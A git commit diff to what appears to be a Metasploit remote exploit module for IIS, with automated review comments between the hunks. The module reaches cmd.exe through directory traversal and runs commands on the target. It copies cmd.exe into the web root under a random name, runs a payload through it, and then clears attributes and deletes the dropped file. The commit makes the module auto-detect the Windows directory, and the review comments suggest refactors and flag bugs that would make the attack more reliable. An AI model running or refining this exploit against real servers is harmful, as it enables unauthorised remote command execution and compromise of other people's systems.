Fixes #4752 - Auto-detect the windows directory and use it for subsequent requests
git-svn-id: file:///home/svn/framework3/trunk@12997 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
03464a168e
commit
69963a45ab
|
@ -53,6 +53,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
[
|
||||
Opt::RPORT(80),
|
||||
OptBool.new('VERBOSE', [ false, 'Enable verbose output', false ]),
|
||||
OptString.new('WINDIR', [ false, 'The windows directory of the target host', nil ]),
|
||||
OptString.new('CMD', [ false, 'Execute this command instead of using command stager', nil ])
|
||||
], self.class)
|
||||
|
||||
|
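Review bot: The new WINDIR option's description, `'The windows directory of the target host'`, does not say what happens when it is left unset, which is the behaviour this commit adds; `'The windows directory of the target host (auto-detected when unset)'` would tell the reader the default without having to read `exploit` and `check`. The options block this line belongs to starts outside the hunk.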
@ -105,14 +106,27 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
[headers, body]
|
||||
end
|
||||
|
||||
|
||||
def detect_windows_dir()
|
||||
win_dirs = [ 'winnt', 'windows' ]
|
||||
win_dirs.each { |dir|
|
||||
|
||||
res = execute_command("dir", { :windir => dir })
|
||||
if (res.kind_of?(Array))
|
||||
body = res[1]
|
||||
if (body and body =~ /Directory of /)
|
||||
return dir
|
||||
end
|
||||
end
|
||||
}
|
||||
return nil
|
||||
end
|
||||
|
||||
|
||||
def check
|
||||
res = execute_command("dir")
|
||||
if (res.kind_of?(Array))
|
||||
body = res[1]
|
||||
if (body and body =~ /Directory of /)
|
||||
return Exploit::CheckCode::Vulnerable
|
||||
end
|
||||
@win_dir = detect_windows_dir()
|
||||
if @win_dir
|
||||
return Exploit::CheckCode::Vulnerable
|
||||
end
|
||||
|
||||
Exploit::CheckCode::Safe
|
||||
|
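Review bot: The unconditional `execute_command("dir")` at the top of `check` runs before `@win_dir` has been assigned, and in the next hunk `execute_command` does `uri << (opts[:windir] || @win_dir)`, so when neither WINDIR nor an earlier detection set it the append of nil raises TypeError unless execute_command rescues it (its start is outside that hunk). That first probe is also redundant, because `detect_windows_dir` repeats the same request and the same `kind_of?(Array)` / `Directory of ` test for each candidate. Letting `detect_windows_dir` take its candidate list, with the configured WINDIR tried first, keeps the test in one place, lets `find` replace the `each` plus `return` loop, and drops the empty `()` from the definition; the version below behaves as the old pair did except that the unguarded probe is gone.
```ruby
  def detect_windows_dir(candidates = ['winnt', 'windows'])
    # first candidate whose "dir" request comes back as a directory listing, else nil
    candidates.find do |dir|
      res = execute_command("dir", { :windir => dir })
      res.kind_of?(Array) && res[1] && res[1] =~ /Directory of /
    end
  end

  def check
    # try the configured directory first, then the usual defaults
    @win_dir = detect_windows_dir([datastore['WINDIR'], 'winnt', 'windows'].compact.uniq)
    return Exploit::CheckCode::Vulnerable if @win_dir

    Exploit::CheckCode::Safe
  end
```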
@ -129,14 +143,15 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
# Using the "start" method doesn't seem to make iis very happy :(
|
||||
return [nil,nil] if cmd =~ /^start [a-zA-Z]+\.exe$/
|
||||
|
||||
print_status("Executing command: #{cmd}")
|
||||
print_status("Executing command: #{cmd} (options: #{opts.inspect})")
|
||||
|
||||
uri = '/scripts/'
|
||||
exe = opts[:cgifname]
|
||||
if (not exe)
|
||||
uri << dotdotslash
|
||||
uri << dotdotslash
|
||||
uri << 'winnt/system32/cmd.exe'
|
||||
uri << (opts[:windir] || @win_dir)
|
||||
uri << '/system32/cmd.exe'
|
||||
else
|
||||
uri << exe
|
||||
end
|
||||
|
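Review bot: The replaced `print_status` on the `Executing command:` line now dumps `opts.inspect` on every call, which repeats the cgifname/windir hash for each request even though the module declares a VERBOSE option; keep the plain message and add the detail only when verbose, e.g. `print_status("Executing command: #{cmd}")` followed by `print_status("  options: #{opts.inspect}") if datastore['VERBOSE']`. A short comment on the `uri << (opts[:windir] || @win_dir)` line would also help, since the precedence (per-call option, then the value stored by check/exploit) is not obvious: `# per-call :windir wins over the directory detected earlier`. The enclosing execute_command starts and ends outside the hunk.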
@ -156,12 +171,22 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
def exploit
|
||||
|
||||
# first copy the file
|
||||
@win_dir = datastore['WINDIR']
|
||||
if not @win_dir
|
||||
# try to detect the windows directory
|
||||
@win_dir = detect_windows_dir()
|
||||
if not @win_dir
|
||||
raise RuntimeError, "Unable to detect the target host windows directory (maybe not vulnerable)!"
|
||||
end
|
||||
end
|
||||
print_status("Using windows directory \"#{@win_dir}\"")
|
||||
|
||||
# now copy the file
|
||||
exe_fname = rand_text_alphanumeric(4+rand(4)) + ".exe"
|
||||
print_status("Copying cmd.exe to the web root as \"#{exe_fname}\"...")
|
||||
# NOTE: this assumes %SystemRoot% on the same drive as the web scripts directory
|
||||
# However, it using %SystemRoot% doesn't seem to work :(
|
||||
res = execute_command("copy \\winnt\\system32\\cmd.exe #{exe_fname}")
|
||||
# Unfortunately, using %SystemRoot% doesn't seem to work :(
|
||||
res = execute_command("copy \\#{@win_dir}\\system32\\cmd.exe #{exe_fname}")
|
||||
|
||||
if (datastore['CMD'])
|
||||
res = execute_command(datastore['CMD'], { :cgifname => exe_fname })
|
||||
|
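Review bot: The nested `if not @win_dir` blocks in `exploit` can be flattened, since the two branches only chain a default and a failure: `@win_dir = datastore['WINDIR'] || detect_windows_dir` followed by `raise RuntimeError, "Unable to detect the target host windows directory (maybe not vulnerable)!" unless @win_dir`. Within the hunk the `res` from the `copy` command is assigned but never inspected before being overwritten by the CMD branch, so a copy that fails (for instance because the detected directory is not on the drive the NOTE above assumes) is only noticed later; checking it there would give a clearer error. The body of exploit continues outside the hunk.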
@ -220,7 +245,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
delete_me_too = "C:\\inetpub\\scripts\\" + @exe_payload
|
||||
|
||||
print_status("Changing permissions on #{delete_me_too} ...")
|
||||
cmd = "C:\\winnt\\system32\\attrib.exe -r -h -s " + delete_me_too
|
||||
cmd = "C:\\#{@win_dir}\\system32\\attrib.exe -r -h -s " + delete_me_too
|
||||
client.sys.process.execute(cmd, nil, {'Hidden' => true })
|
||||
|
||||
print_status("Deleting #{delete_me_too} ...")
|
||||
|
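Review bot: `cmd = "C:\\#{@win_dir}\\system32\\attrib.exe ..."` still hard-codes the `C:` drive even though the directory name is now detected, so the new value only helps when the system root lives on C:, and the same fixed drive sits in `delete_me_too` just above. Worth a comment where the drive is assumed, `# NOTE: assumes the system root and the web root are both on C:`, so the limitation is visible next to the newly variable part. The enclosing method starts and ends outside the hunk.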
|